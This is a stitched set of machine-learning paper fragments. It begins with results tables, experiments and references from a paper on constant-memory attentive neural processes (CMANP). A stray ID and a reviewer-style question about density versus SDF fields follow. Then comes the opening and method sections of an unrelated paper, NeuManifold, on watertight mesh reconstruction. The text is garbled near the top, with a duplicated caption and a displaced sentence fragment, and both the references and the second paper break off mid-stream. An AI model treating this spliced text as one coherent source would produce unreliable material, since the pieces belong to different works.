| CNP | 2.15 ± 0.01 | 2.43 ± 0.00 | 2.55 ± 0.02 | 0.73 ± 0.00 | 0.49 ± 0.01 |
| CANP | 2.66 ± 0.01 | 3.15 ± 0.00 | — | 0.94 ± 0.01 | 0.82 ± 0.01 |
| NP | 2.48 ± 0.02 | 2.60 ± 0.01 | 2.67 ± 0.01 | 0.79 ± 0.01 | 0.59 ± 0.01 |
| ANP | 2.90 ± 0.00 | — | — | 0.98 ± 0.00 | 0.89 ± 0.00 |
| BNP | 2.76 ± 0.01 | 2.97 ± 0.00 | — | 0.88 ± 0.01 | 0.73 ± 0.01 |
| BANP | 3.09 ± 0.00 | — | — | 1.01 ± 0.00 | 0.94 ± 0.00 |
| TNP-D | 3.89 ± 0.01 | 5.41 ± 0.01 | — | **1.46 ± 0.01** | **1.31 ± 0.00** |
| LBANP | 3.97 ± 0.02 | 5.09 ± 0.02 | 5.84 ± 0.01 | 1.39 ± 0.01 | 1.17 ± 0.01 |
| CMANP (Ours)| 3.93 ± 0.05 | 5.02 ± 0.14 | 5.55 ± 0.01 | 1.36 ± 0.01 | 1.09 ± 0.01 |
| TNP-ND | 5.48 ± 0.02 | — | — | **1.50 ± 0.00** | **1.31 ± 0.00** |
| LBANP-ND | 5.57 ± 0.03 | — | — | 1.42 ± 0.01 | 1.14 ± 0.01 |
| CMANP-AND (Ours) | **6.31 ± 0.04** | **6.96 ± 0.07** | **7.15 ± 0.14** | **1.48 ± 0.03** | **1.19 ± 0.03** |

Table 2: Image Completion Experiments. Each method is evaluated with 5 different seeds according to the log-likelihood (higher is better). A dash represents methods that could not be run because of their large memory requirement.
The "dash" represents methods that could not be run because of the large memory requirement. to predict the remaining pixels of the image. Each image corresponds to a unique function \cite{Garnelo2018}. In this experiment, the \( x \) values are rescaled to \([-1, 1]\) and the \( y \) values are rescaled to \([-0.5, 0.5]\). For each task, a randomly selected set of pixels are selected as context datapoints and target datapoints. EMNIST comprises black and white images of handwritten letters of \( 32 \times 32 \) resolution. 10 classes are used for training. The context and target datapoints are sampled according to \( N \sim \mathcal{U}[3, 197] \) and \( M \sim \mathcal{U}[3, 200 - N] \) respectively. CelebA comprises coloured images of celebrity faces. Methods are evaluated on various resolutions to show the scalability of the methods. In CelebA32, images are downsampled to \( 32 \times 32 \) and the number of context and target datapoints are sampled according to \( N \sim \mathcal{U}[3, 197] \) and \( M \sim \mathcal{U}[3, 200 - N] \) respectively. In CelebA64, the images are down-sampled to \( 64 \times 64 \) and \( N \sim \mathcal{U}[3, 797] \) and \( M \sim \mathcal{U}[3, 800 - N] \). In CelebA128, the images are down-sampled to \( 128 \times 128 \) and \( N \sim \mathcal{U}[3, 1597] \) and \( M \sim \mathcal{U}[3, 1600 - N] \). Results. Although all NP baselines (see Table 2) were able to be evaluated on CelebA (32 x 32) and EMNIST, many were not able to scale to CelebA (64 x 64) and CelebA (128 x 128). All Not-Diagonal variants were not able to be trained on CelebA (64 x 64) and CelebA (128 x 128) due to being too computationally expensive and requiring quadratic computation and memory. In contrast, CMANP(-AND) was not affected by this limitation, showing empirically CMANP-AND is scalable to more datapoints than prior Not-Diagonal variants. The results show that CMANP-AND achieves clear state-of-the-art results on CelebA (32x32), CelebA (64x64), and CelebA (128x128). Furthermore, CMANP-AND achieves results competitive with state-of-the-art on EMNIST. Notably, the vanilla variants of CMANP (CMAB-based model) and LBANP (iterative attention-based model \cite{Jaegle2021}) achieve similar performance while having the same sized bottleneck, i.e., the number of latents in both baselines is 128. These results suggest that the improved efficiency properties (constant memory and constant computation updates) of CMABs come at little cost in performance compared to iterative attention. ### 4.2 1-D Regression In this experiment, the goal is to model an unknown function \( f \) and make predictions for a batch of \( M \) target datapoints given a batch of \( N \) context datapoints. During each training epoch, a batch of \( B = 16 \) functions are sampled from a GP prior with an RBF kernel \( f_i \sim GP(m, k) \) where \( m(x) = 0 \) and \( k(x, x') = \sigma_f^2 \exp\left(-\frac{(x-x')^2}{2l^2}\right) \). The hyperparameters are sampled according to \( l \sim \mathcal{U}[0.6, 1.0] \), \( \sigma_f \sim \mathcal{U}[0.1, 1.0] \), \( N \sim \mathcal{U}[3, 47] \), and \( M \sim \mathcal{U}[3, 50 - N] \). After training, the models are evaluated according to the log-likelihood of the targets on functions sampled from GPs with RBF and Matern 5/2 kernels. Results. As shown in Table 3, CMANP-AND outperforms all baselines (except for TNP-ND) by a significant margin. CMANP-AND achieves comparable results to TNP-ND while only requiring constant memory. 
4.2.1 Analysis

Empirical Memory: Figure 3 compares the empirical memory cost of various state-of-the-art NP methods during evaluation. Comparing the vanilla variants of NPs, we see that TNP-D (transformer-based model) scales quadratically with respect to the number of context datapoints, while LBANP (iterative attention-based model) scales linearly. In contrast, CMANP (CMAB-based model) requires only a low constant amount of memory regardless of the number of context datapoints. Comparing the Not-Diagonal variants of NPs, we see that both TNP-ND and LBANP-ND scale quadratically with respect to the number of target datapoints, limiting their applications. In contrast, CMANP-AND can scale to a far larger number of target datapoints. As a result, CMANPs are significantly more memory efficient and scalable to more datapoints than prior state-of-the-art methods.

Effect of $b_Q$: Figure 4 compares performance with respect to varying query block sizes $b_Q$ for CMANP-AND. We see that smaller block sizes achieve significantly better performance. This is expected, as the autoregressive nature of the Neural Process results in a more flexible predictive distribution and hence better performance, at the cost of an increased time complexity. We provide an analysis of the time complexity in the appendix (Figures 6 and 7).

Varying Number of Latents: In Figure 4, we evaluate the effect of varying the number of input latents ($L_I$) and the number of latents per block ($L_B$). We find that increasing the size of the bottleneck (i.e., the number of latents $L_I$ and $L_B$) considerably improves the performance of the model. This, however, naturally comes at an increased memory cost.

| Method | RBF | Matern 5/2 |
|--------------|---------|------------|
| CNP | 0.26 ± 0.02 | 0.04 ± 0.02 |
| CANP | 0.79 ± 0.00 | 0.62 ± 0.00 |
| NP | 0.27 ± 0.01 | 0.07 ± 0.01 |
| ANP | 0.81 ± 0.00 | 0.63 ± 0.00 |
| BNP | 0.38 ± 0.02 | 0.18 ± 0.02 |
| BANP | 0.82 ± 0.01 | 0.66 ± 0.00 |
| TNP-D | 1.39 ± 0.00 | 0.95 ± 0.01 |
| LBANP | 1.27 ± 0.02 | 0.85 ± 0.02 |
| CMANP (Ours) | 1.24 ± 0.01 | 0.80 ± 0.01 |
| TNP-ND | 1.46 ± 0.00 | 1.02 ± 0.00 |
| LBANP-ND | 1.24 ± 0.03 | 0.78 ± 0.02 |
| CMANP-AND (Ours) | 1.48 ± 0.03 | 0.96 ± 0.01 |

Table 3: 1-D Meta-Regression Experiments with log-likelihood metric (higher is better).

Figure 4: (Left) CMANP's performance relative to the prediction block size ($b_Q$). (Middle) CMANP's performance relative to the number of input latent vectors ($|L_I|$). (Right) CMANP's performance relative to the number of block-wise latent vectors ($|L_B|$).

5 Related Work

Transformers (Vaswani et al., 2017) have achieved a large amount of success in a wide range of applications. However, the quadratic scaling of Transformers limits their applications, and as such there have been many follow-up works on efficient variants. Very few, however, achieve constant memory complexity; to the best of our knowledge, there are only two. Rabe & Staats (2022) showed that self-attention can be computed in constant memory at the expense of an overall quadratic computation. Wu et al.
(2022) proposed Memformer, a constant-memory version of the transformer designed specifically for sequence modelling, which leverages an external dynamic memory to encode and decode information that is updated over timesteps. As such, the memory/latent state of Memformer changes depending on the order of the datapoints. In contrast, CMABs require only linear computation and constant memory, and are permutation-invariant by default, i.e., not limited to sequence modelling. For an in-depth overview of follow-up works to Transformers, we refer the reader to the recent survey works (Khan et al., 2022; Lin et al., 2022).

Although CMABs have an efficient update mechanism reminiscent of RNNs (Cho et al., 2014; Chung et al., 2014; Hochreiter & Schmidhuber, 1997), their applications are different. RNNs are sensitive to input order, making them best suited to applications with sequential data. In contrast, CMABs are permutation-invariant by design. Due to their long computation graphs, RNNs also suffer from issues such as vanishing gradients, making them difficult to train with a large number of datapoints. CMABs do not suffer from vanishing gradients, since their efficient update ability is a fixed property of the module rather than a learned mechanism as in RNNs.

NPs are applied in a wide range of applications, including Temporal Point Processes (Bae et al., 2023), sequence data (Singh et al., 2019; Willi et al., 2019), modelling stochastic physics fields (Holderrieth et al., 2021), robotics (Chen et al., 2022; Li et al., 2022b), and climate modelling (Vaughan et al., 2021). Accordingly, several methods have been proposed for encoding the context dataset. For example, CNPs (Garnelo et al., 2018a) encode the context set via a deep sets encoder (Zaheer et al., 2017), NPs (Garnelo et al., 2018b) propose to encode functional stochasticity via a latent variable, ConvCNPs (Gordon et al., 2019) use convolutions to build in translational equivariance, and ANPs (Kim et al., 2019), LBANPs (Feng et al., 2023), and TNPs (Nguyen & Grover, 2022) use various kinds of attention. Recent work (Bruinsma et al., 2023) builds on CNPs and ConvCNPs by proposing to make them autoregressive at deployment. For an in-depth overview of NPs and their applications, we refer the reader to the recent survey work (Jha et al., 2022).

6 CONCLUSION

In this work, we introduced CMAB (Constant Memory Attention Block), a novel general-purpose attention block that (1) is permutation invariant, (2) computes its output in constant memory, and (3) performs updates in constant computation. Building on CMAB, we proposed Constant Memory Attentive Neural Processes (CMANPs), a new NP variant requiring only constant memory. Leveraging the efficient-updates property of CMAB, we introduced CMANP-AND (Autoregressive Not-Diagonal extension). Empirically, we showed that CMANP(-AND) achieves state-of-the-art results while being significantly more efficient than prior state-of-the-art methods. In our analysis, we also showed that either increasing the size of the latent bottleneck ($L_I$ and $L_B$) or decreasing the block size ($b_Q$) can further improve model performance.

REFERENCES

Wonho Bae, Mohamed Osama Ahmed, Frederick Tung, and Gabriel L. Oliveira. Meta temporal point processes. In *International Conference on Learning Representations*, 2023. URL https://openreview.net/forum?id=QZfdDpTXluM.

Wessel Bruinsma, Stratis Markou, James Requeima, Andrew Y. K.
Foong, Tom Andersson, Anna Vaughan, Anthony Buonomo, Scott Hosking, and Richard E Turner. Autoregressive conditional neural processes. In *The Eleventh International Conference on Learning Representations*, 2023. URL https://openreview.net/forum?id=OAsXFPBfTBh.

Ruijie Chen, Ning Gao, Ngo Anh Vien, Hanna Ziesche, and Gerhard Neumann. Meta-learning regrasping strategies for physical-agnostic objects. *arXiv preprint arXiv:2205.11110*, 2022.

Kyunghyun Cho, Bart Van Merriënboer, Dzmitry Bahdanau, and Yoshua Bengio. On the properties of neural machine translation: Encoder-decoder approaches. *arXiv preprint arXiv:1409.1259*, 2014.

Junyoung Chung, Caglar Gulcehre, KyungHyun Cho, and Yoshua Bengio. Empirical evaluation of gated recurrent neural networks on sequence modeling. *arXiv preprint arXiv:1412.3555*, 2014.

Gregory Cohen, Saeed Afshar, Jonathan Tapson, and Andre Van Schaik. Emnist: Extending mnist to handwritten letters. In *2017 International Joint Conference on Neural Networks (IJCNN)*, pp. 2921–2926. IEEE, 2017.

Leo Feng, Hossein Hajimirsadeghi, Yoshua Bengio, and Mohamed Osama Ahmed. Latent bottlenecked attentive neural processes. In *International Conference on Learning Representations*, 2023. URL https://openreview.net/forum?id=yIxtevizEA.

Andrew Foong, Wessel Bruinsma, Jonathan Gordon, Yann Dubois, James Requeima, and Richard Turner. Meta-learning stationary stochastic process prediction with convolutional neural processes. *Advances in Neural Information Processing Systems*, 33:8284–8295, 2020.

Marta Garnelo, Dan Rosenbaum, Christopher Maddison, Tiago Ramalho, David Saxton, Murray Shanahan, Yee Whye Teh, Danilo Rezende, and SM Ali Eslami. Conditional neural processes. In *International Conference on Machine Learning*, pp. 1704–1713. PMLR, 2018a.

Marta Garnelo, Jonathan Schwarz, Dan Rosenbaum, Fabio Viola, Danilo J Rezende, SM Eslami, and Yee Whye Teh. Neural processes. *arXiv preprint arXiv:1807.01622*, 2018b.

Jonathan Gordon, Wessel P Bruinsma, Andrew YK Foong, James Requeima, Yann Dubois, and Richard E Turner. Convolutional conditional neural processes. In *International Conference on Learning Representations*, 2019.

Sepp Hochreiter and Jürgen Schmidhuber. Long short-term memory. *Neural Computation*, 9(8):1735–1780, 1997. doi: 10.1162/neco.1997.9.8.1735.

Peter Holderrieth, Michael J Hutchinson, and Yee Whye Teh. Equivariant learning of stochastic fields: Gaussian processes and steerable conditional neural processes. In *International Conference on Machine Learning*, pp. 4297–4307. PMLR, 2021.

Andrew Jaegle, Felix Gimeno, Andy Brock, Oriol Vinyals, Andrew Zisserman, and Joao Carreira. Perceiver: General perception with iterative attention. In *International Conference on Machine Learning*, pp. 4651–4664. PMLR, 2021.

Saurav Jha, Dong Gong, Xuesong Wang, Richard E Turner, and Lina Yao. The neural process family: Survey, applications and perspectives. *arXiv preprint arXiv:2209.00517*, 2022.

Salman Khan, Muzammal Naseer, Munawar Hayat, Syed Waqas Zamir, Fahad Shahbaz Khan, and Mubarak Shah. Transformers in vision: A survey. *ACM Computing Surveys (CSUR)*, 54(10s):1–41, 2022.

Hyunjik Kim, Andriy Mnih, Jonathan Schwarz, Marta Garnelo, Ali Eslami, Dan Rosenbaum, Oriol Vinyals, and Yee Whye Teh. Attentive neural processes. In *International Conference on Learning Representations*, 2019.
f4HohsyNEk
SDF-based reconstruction methods (e.g. NeuS) claim that the raw density field is optimized only to satisfy the rendering objective (and is also biased away from the true surface), and therefore are not ideal for surface reconstruction. In this paper, you argue that this is unnecessary and that using the density field directly is a better choice. Could you elaborate on this choice?
NeuManifold: Neural Watertight Manifold Reconstruction with Efficient and High-Quality Rendering Support

Anonymous authors
Paper under double-blind review

Abstract

We present a method for generating high-quality watertight manifold meshes from multi-view input images. Existing volumetric rendering methods are robust in optimization but tend to generate noisy meshes with poor topology. Differentiable rasterization-based methods can generate high-quality meshes but are sensitive to initialization. Our method combines the benefits of both worlds; we take the geometry initialization obtained from neural volumetric fields, and further optimize the geometry as well as a compact neural texture representation with differentiable rasterizers. Through extensive experiments, we demonstrate that our method can generate accurate mesh reconstructions with faithful appearance that are comparable to previous volume rendering methods while being an order of magnitude faster in rendering. We also show that our generated mesh and neural texture reconstruction is compatible with existing graphics pipelines and enables downstream 3D applications such as simulation.

Fig. 1. NeuManifold takes 2D images as input and generates watertight manifold meshes with neural textures. NeuManifold enables many downstream applications including high-quality novel-view synthesis and soft-body simulation.

1 Introduction

Recent advancements in neural field representations (Mildenhall et al., 2021; Müller et al., 2022; Chen et al., 2023b) have enabled scene reconstructions with photorealistic rendering quality. However, they use volumetric representations, resulting in slow rendering and limited support for standard 3D pipelines like appearance editing, physical simulation, and geometry processing. For many such applications, meshes—especially those that are manifold and watertight—are the preferred option. Meshes can be rendered efficiently with standard 3D rendering engines, and the watertight manifold property is often favorable in many geometry processing algorithms, such as mesh boolean operations, approximate convex decomposition (Wei et al., 2022), tetrahedralization (Hang, 2015) for simulation, and volumetric point sampling to initialize particle simulation.

Although mesh reconstruction has been extensively studied in prior art (Schönberger et al., 2016; Snavely et al., 2006; Furukawa & Ponce, 2010), reconstructing a high-quality mesh with realistic rendering remains a highly challenging task. To address this, recent advancements in inverse graphics through differentiable surface rendering have shown great promise, such as nvdiffrec (Munkberg et al., 2021) and nerf2mesh (Tang et al., 2022). Nevertheless, the rendering quality of these methods still lags behind that of neural field-based methods, and their meshes are only optimized for rendering applications, resulting in non-manifold models with self-intersections that are unsuitable for simulation and other geometry processing applications.

Our objective is to bridge this gap by reconstructing high-quality meshes that facilitate fast rendering and are broadly supported for 3D applications beyond rendering, while preserving the superior visual quality of volumetric approaches. To accomplish this, we introduce NeuManifold, a novel neural approach that can produce a high-quality, watertight manifold mesh of a 3D scene with neural textures. As depicted in Fig. 1, our technique achieves photo-realistic rendering quality.
More significantly, our mesh-based model can be employed directly in physical simulation engines that frequently require watertight and even manifold meshes. We achieve this by integrating advanced neural field rendering with differentiable rasterization-based mesh reconstruction techniques.

We observe that volumetric neural field rendering and differentiable rasterization have complementary benefits. While neural field-based approaches like TensoRF (Chen et al., 2022a) can produce high visual quality and generate density fields as scene geometry, the exported meshes, when rendered using surface rendering (rasterization), cannot retain the original high visual quality achieved with volume rendering. In contrast, differentiable mesh rasterization techniques such as nvdiffrec (Munkberg et al., 2021) directly optimize the final mesh output using rendering supervision. Yet, they are sensitive to geometry initialization and can get stuck in local minima, especially when reconstructing high-resolution meshes (see Fig. 5). Therefore, we propose leveraging neural field reconstruction techniques to create high-quality initializations for differentiable rasterization, significantly enhancing the final mesh reconstruction quality.

Additionally, we have observed that the non-linearity of the density field can lead to undesirable artifacts when using previously prevalent differentiable marching algorithms (Shen et al., 2021), as illustrated in Fig. 3. To address this issue, we introduce Differentiable Marching Cubes (DiffMC), which effectively eliminates these artifacts and results in significantly smoother surfaces.

Furthermore, we enhance the visual quality of our model by modeling appearance using neural textures instead of the traditional BRDF textures utilized in most inverse rendering methods (Munkberg et al., 2021; Luan et al., 2021). Specifically, we use TensoRF (Chen et al., 2022a) to compactly factorize a 3D neural field into axis-aligned orthogonal 2D and 1D neural textures. While TensoRF uses volume rendering, we extract features from these neural textures at surface points on a mesh and decode view-dependent colors for surface rendering in differentiable rasterization. We demonstrate that our factorized neural textures produce superior rendering quality compared to other texture representations, including iNGP-based hash grids and MLPs (see Table 4).

Our work offers the following key contributions:

• We propose NeuManifold, which excels at producing high-quality watertight manifold meshes. These meshes support not only realistic rendering but also applications in a diverse array of physical simulations and geometry processing tasks.
• We introduce the first complete Differentiable Marching Cubes (DiffMC) implementation utilizing CUDA, delivering smooth surfaces from density fields. It runs around $10\times$ faster than the previous prevalent mesh extraction algorithm (DMTet) at similar triangle counts.
• Furthermore, our mesh-based representation can be seamlessly integrated with GLSL shaders, enabling real-time rendering applications.

2 RELATED WORK

Neural field representations. Neural rendering methods have demonstrated photo-realistic scene reconstruction and rendering quality. In particular, NeRF (Mildenhall et al., 2021) introduced the neural radiance field representation and achieved remarkable visual quality with volume rendering techniques.
Various neural field representations have been proposed for better efficiency and quality, including MipNeRF (Barron et al., 2021) and RefNeRF (Verbin et al., 2022) that are based on coordinate-based MLPs, TensoRF (Chen et al., 2022a) and DiF (Chen et al., 2023a) that leverage tensor factorization, iNGP (Müller et al., 2022) that introduces multi-scale hashing, Plenoxels (Fridovich-Keil et al., 2022) and DVGO (Sun et al., 2022) that are voxel-based, and Point-NeRF (Xu et al., 2022) that is based on neural point clouds.

Fig. 2. Overall training pipeline for Stages 1 and 2 of NeuManifold. In Stage 1, volumetric rendering pipelines are used to initialize geometry and appearance networks. In Stage 2, the initialized geometry and appearance networks are further trained in differentiable rasterization with the help of DiffMC. The generated watertight manifold mesh and optimized appearance network are used in deployment.

However, most neural field representations represent 3D geometry as a volume density field, which is hard to edit for 3D applications other than rendering. While several methods have enabled appearance editing or shape deformation for such neural fields (Xiang et al., 2021; Zhang et al., 2022a; Yuan et al., 2022; Wu et al., 2022; Kuang et al., 2022; Chong Bao and Bangbang Yang et al., 2022), it is still highly challenging to apply them directly in modern 3D engines. Recent methods have proposed replacing density fields with volume SDFs to achieve better surface reconstruction with volume rendering (Wang et al., 2021; 2022; Yariv et al., 2021; Oechsle et al., 2021). However, neither density- nor SDF-based models can be easily exported as meshes without significantly losing their rendering quality. Another recent work, MobileNeRF (Chen et al., 2022b), converts the neural field into a triangle soup for real-time rendering. However, its mesh does not model accurate scene geometry and thus cannot be used for downstream applications. Our work offers a general solution to convert volumetric neural field representations to high-quality manifold meshes, enabling both high-quality rendering and broad additional 3D applications like physical simulation.

Mesh reconstruction and rendering. Polygonal meshes are a staple in modern 3D engines, widely employed for modeling, simulation, and rendering. Previous research has extensively explored mesh reconstruction from multi-view captured images through photogrammetry systems (Pollefeys & Van Gool, 2002; Snavely et al., 2006; Schönberger et al., 2016) like structure from motion (Schönberger & Frahm, 2016; Tang & Tan, 2019; Vijayanarasimhan et al., 2017), multi-view stereo (Furukawa & Ponce, 2010; Kutulakos & Seitz, 2000; Schönberger et al., 2016; Yao et al., 2018; Cheng et al., 2020), and surface extraction techniques (Lorensen & Cline, 1987; Kazhdan et al., 2006). However, achieving photorealistic rendering with classical photogrammetry pipelines remains a formidable challenge. On the other hand, inverse rendering aims to fully disentangle intrinsic scene properties from captured images (Goldman et al., 2009; Hernandez et al., 2008; Zhang et al., 2021b; Bi et al., 2020b;c;a; Zhang et al., 2021a; Li et al., 2018; Zhang et al., 2022b). Recent methods, such as nvdiffrec (Munkberg et al., 2021), nerf2mesh (Tang et al., 2022), and BakedSDF (Yariv et al., 2023), achieve high-quality reconstruction and fast rendering speed.
Nevertheless, these methods often introduce self-intersections or an excessive number of triangles in the mesh reconstruction, which are undesired for simulation and geometry processing tasks. Moreover, in recent years, several studies (Liao et al., 2018; Remelli et al., 2020; Shen et al., 2021; Mehta et al., 2022; Shen et al., 2023) have delved into differentiable mesh extraction algorithms due to their crucial role in mesh optimization workflows, connecting implicit field and explicit mesh representations. However, they still have limitations, such as surface artifacts (Shen et al., 2021) and a lack of manifold guarantees (Liao et al., 2018; Shen et al., 2023). Our DiffMC generates significantly smoother surfaces on density fields and maintains watertight manifold properties.

In summary, our approach leverages neural field reconstruction to provide a high-quality initialization for differentiable rendering, and we integrate it with differentiable marching cubes to ensure that our final output is manifold and watertight. This enables our model to be directly applied to a wide range of 3D applications.

3 METHOD

We present a 3D reconstruction pipeline that reconstructs scene geometry and appearance from captured multi-view images. Our method consists of two main stages, initialization with differentiable volume rendering and manifold generation with differentiable rasterization (illustrated in Fig. 2), plus an optional fine-tuning stage. In particular, we leverage neural field representations with volume rendering-based reconstruction to offer the initialization for the subsequent mesh optimization, where we further optimize the topology, geometry, and appearance with differentiable marching cubes and rasterization. Optionally, when the manifold property is not required, we fine-tune the geometry and appearance by directly moving mesh vertices. Finally, we deploy the pipeline with GLSL shaders for cross-platform real-time rendering and demonstrate the important role of anti-aliasing in visual quality.

3.1 Neural Field Representation

We represent a 3D scene with a geometry network $G$ and an appearance network $A$. In particular, given an arbitrary 3D location $x$, the geometry network outputs its corresponding volume density $\sigma$, and the appearance network regresses a view-dependent color $c$ at the location. This can be expressed as:
$$\sigma_x, c_x = G(x), A(x, d) \quad (1)$$
where $d$ is the viewing direction. Our approach supports any common neural field representation for the geometry and appearance networks. In this work, we choose the state-of-the-art neural field representation TensoRF (Chen et al., 2022a) as the network architecture. To balance rendering quality and inference speed, we propose two kinds of appearance networks. For the high-quality version, we adopt Vector-Matrix (VM) decomposition plus an MLP. For the fast version, we utilize VM decomposition plus Spherical Harmonics (SH), which greatly accelerates inference speed on deployment; we discuss this in detail in Sec. 3.5.

3.2 Initialization by Volume Rendering (Stage 1)

In the first stage, we train the networks through differentiable volume rendering to establish a strong initialization for the subsequent differentiable rasterization-based optimization phase.
As in NeRF, we render pixel colors $C$ using the volume density and view-dependent colors from our geometry and appearance models as:
$$C = \sum_{i=1}^{N} T_i (1 - \exp(-\sigma_i \delta_i)) c_i, \quad T_i = \exp\left(-\sum_{j=1}^{i-1} \sigma_j \delta_j\right). \quad (2)$$
where $T$ is the volume transmittance and $\delta$ is the ray marching step size. This differentiable rendering process allows us to optimize our networks with a rendering loss.

3.3 Manifold Generation & Optimization (Stage 2)

In the second stage of our process, we leverage a pipeline similar to nvdiffrec (Munkberg et al., 2021) to optimize the object topology, geometry, and appearance simultaneously. Unlike nvdiffrec, which directly optimizes the SDF function from scratch, we utilize the pre-trained TensoRF models from the previous stage as initialization. Additionally, we replace the marching algorithm from Differentiable Marching Tetrahedra (DMTet) (Shen et al., 2021) with our Differentiable Marching Cubes (DiffMC), which seamlessly integrates pre-trained density networks into the differentiable rasterization pipeline and significantly reduces artifacts on mesh surfaces.

Different from nvdiffrec, which optimizes SDF values stored on the grid, our method needs to convert the output of the density network to these values, since SDF-based methods tend to exhibit lower visual fidelity and can lose high-frequency details in the geometry. With the pre-trained TensoRF density network, we convert density into opacity as $\alpha = 1 - \exp(-\sigma \cdot \delta)$, where $\sigma$ denotes density, $\alpha$ denotes opacity, and $\delta$ is the ray step size used in volume rendering. We consider a threshold $t$ that controls the position of the surface with respect to opacity and send the value $\alpha - t$ to DiffMC to obtain our manifold mesh.

During the conversion of the density field into a mesh, we encountered notable artifacts with DMTet. These issues arise primarily from the non-linear nature of the density field. As illustrated in Fig. 3, when we apply a non-linear transformation like $\exp()$ to a standard SDF field, the mesh extracted by DMTet develops deformations with peaks and valleys. This happens because the conventional linear interpolation method is no longer adequate for dealing with the non-linear field, and the way it divides space into tetrahedra results in artifacts on surfaces that do not align well with these tetrahedral divisions. Given that most real-world objects tend to be axis-aligned, adopting an axis-aligned space division can significantly reduce these artifacts. More explanations are in Appendix Sec. B.

Therefore, we introduce Differentiable Marching Cubes (DiffMC), which operates on an axis-aligned grid. DiffMC not only extracts the mesh using the conventional marching cubes algorithm (Lorensen & Cline, 1987) but also provides vertex gradients with respect to the grid, denoted as $\frac{\partial v}{\partial g}$. This enables the mesh extraction process to be seamlessly combined with the mesh optimization pipeline using the chain rule: $\frac{\partial L}{\partial \theta} = \sum_{v \in V} \frac{\partial L}{\partial v} \frac{\partial v}{\partial g} \frac{\partial g}{\partial \theta}$, where $L$ is the rendering loss, $\theta$ is the set of parameters in the density network, $V$ is the set of mesh vertices, and $g$ is the grid. In a manner akin to the approach outlined in Shen et al. (2021), we incorporate deformable vectors into the grid that can be optimized. This allows the extracted mesh to adjust more effectively to the desired shape by making subtle adjustments within half of the cube.
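A minimal sketch of the density-to-field conversion is shown below; `density_net`, `delta`, and the default threshold are placeholders (the paper leaves $t$ unspecified here), and the actual DiffMC kernel that consumes the resulting field is implemented in CUDA.

```python
import torch

def density_to_mc_field(density_net, grid_pts, delta, t=0.5):
    """Scalar field fed to DiffMC, per the conversion above (t = 0.5 is assumed).

    alpha = 1 - exp(-sigma * delta), and alpha - t puts the desired surface at
    the zero level set; gradients flow back to the density-network parameters
    through this op and DiffMC's vertex-to-grid derivatives dv/dg.
    """
    sigma = density_net(grid_pts)             # (G,) densities on the MC grid
    alpha = 1.0 - torch.exp(-sigma * delta)   # opacity per ray-marching step
    return alpha - t                          # zero crossing = extracted surface
```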
As shown in Fig. 3, DiffMC is less influenced by the non-linearity and is capable of producing significantly smoother surfaces, even on geometries that are not aligned with the axes. To the best of our knowledge, we are the first to implement the complete differentiable marching cubes, achieving exceptionally fast speeds that are $10\times$ faster than DMTet.

We put the resulting mesh into nvdiffrast (Laine et al., 2020) to render 2D images and use the rendering loss to update the geometry and appearance networks. Precisely, the points on the mesh surface are passed through the appearance network to generate the output color for each pixel. With a strong initialization from networks pre-trained in volume rendering and the marching cubes algorithm, we are able to obtain watertight manifold meshes that are more accurate than those of both volumetric rendering and mesh rendering alone, with better visual quality.

### 3.4 Geometry and Appearance Fine-tuning (Stage 3)

The mesh generated in the previous stage is guaranteed to be a watertight manifold, which satisfies the rigorous requirements of common geometry processing algorithms. However, maintaining manifoldness may come at the cost of rendering quality, particularly for areas with intricate structures where preserving both structural details and optimal triangle connections can be challenging. We address this issue with an optional fine-tuning stage to further enhance rendering quality for applications where manifold properties are not necessary. Here, we solely fine-tune the mesh vertex positions and appearance network to improve the rendering loss. While this operation may introduce self-intersections, it preserves the original good edge connections, thus retaining watertightness.

### 3.5 Deployment

**GLSL shaders.** Our pipeline produces a triangle mesh with an appearance network consisting of TensoRF and MLPs. This can be directly mapped to a traditional rasterization pipeline as GLSL shaders. We upload TensoRF weights as three 3D textures and three 1D textures with linear filtering, and MLP weights as 2D textures. After rasterizing triangles in the vertex shader, we evaluate TensoRF and MLPs in the fragment shader with model-space coordinates and viewing directions. We further accelerate the deployed rendering pipeline using models with different MLP sizes as well as a spherical harmonics version. We summarize these quality/speed trade-offs in Table 5.

**Anti-Aliasing.** Aliasing is a common issue in rasterization pipelines due to the undersampling of high-frequency features, such as mesh edges and detailed textures. In contrast to volumetric rendering, where semi-transparent volumes can mitigate aliasing, mesh-based rendering pipelines are significantly affected by this problem. Supersample anti-aliasing (SSAA) is the most straightforward method to mitigate aliasing; it renders high-resolution images and downsamples them to the target resolution. While SSAA provides the best visual quality, it is computationally expensive due to the increased resolution. An alternative approach is multisample anti-aliasing (MSAA), which is enabled by modern GPU hardware. MSAA reduces the cost of anti-aliasing by performing increased shader evaluation only on pixels covered by multiple triangles, shading each triangle once. It improves visual fidelity at a relatively small performance hit, as shown in Appendix Fig. 16.
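As a reference point for this trade-off, SSAA is only a few lines of code. The sketch below assumes a hypothetical `render_fn(h, w)` returning a (C, h, w) image tensor; 16× SSAA in the tables corresponds to `s = 4` (a 4 × 4 sample grid per pixel).

```python
import torch.nn.functional as F

def ssaa_render(render_fn, height, width, s=4):
    """Supersample anti-aliasing: render at s-times resolution, box-downsample."""
    hi = render_fn(height * s, width * s)                # supersampled render
    return F.avg_pool2d(hi.unsqueeze(0), s).squeeze(0)   # average s*s samples/pixel
```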
4 EXPERIMENTS

4.1 IMPLEMENTATION DETAILS

For the first stage, we directly build on off-the-shelf volume rendering models. Specifically, for TensoRF, we use the official implementation. We compare two of our models for our main results: a high-quality one, labeled Ours (HQ), which uses TensoRF (VM) with 48-dim input features and 12-dim output features, plus a three-layer MLP decoder; and a fast one, labeled Ours (F), which uses TensoRF (VM) with 48-dim input features and outputs 27-dim SH coefficients. More details about the network architecture are in the supplementary. We train all the Stage 2 and 3 models with a batch size of 2 for 10k iterations. We use DiffMC with a grid resolution of 256 for all results, except when comparing with nvdiffrec, where we use the default resolution of 128, as nvdiffrec's performance drops at higher resolutions, possibly due to the decreased batch size and harder optimization.

4.2 COMPARISON ON NOVEL-VIEW SYNTHESIS

